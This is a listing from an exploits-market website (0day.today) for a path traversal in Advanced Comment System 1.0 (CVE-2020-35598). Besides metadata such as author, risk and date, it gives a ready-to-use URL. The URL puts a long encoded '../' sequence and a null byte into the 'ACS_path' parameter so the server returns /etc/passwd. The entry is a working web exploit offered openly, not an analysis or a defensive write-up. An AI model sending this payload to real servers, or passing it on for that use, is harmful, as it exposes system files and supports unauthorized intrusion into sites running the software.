[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

Advanced Comment System 1.0 - (ACS_path) Path Traversal Vulnerability

Author
n0ipr0cs
Risk
[
Security Risk Medium
]
0day-ID
0day-ID-35591
Category
web applications
Date add
04-01-2021
CVE
CVE-2020-35598
Platform
php
# Exploit Title: Advanced Comment System 1.0 - 'ACS_path' Path Traversal
# Exploit Author: Francisco Javier Santiago Vázquez aka "n0ipr0cs"
# Vendor Homepage: Advanced Comment System - ACS
# Version: v1.0
# CVE: CVE-2020-35598

http://localhost/advanced_component_system/index.php?ACS_path=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd%00

#  0day.today [2024-12-25]  #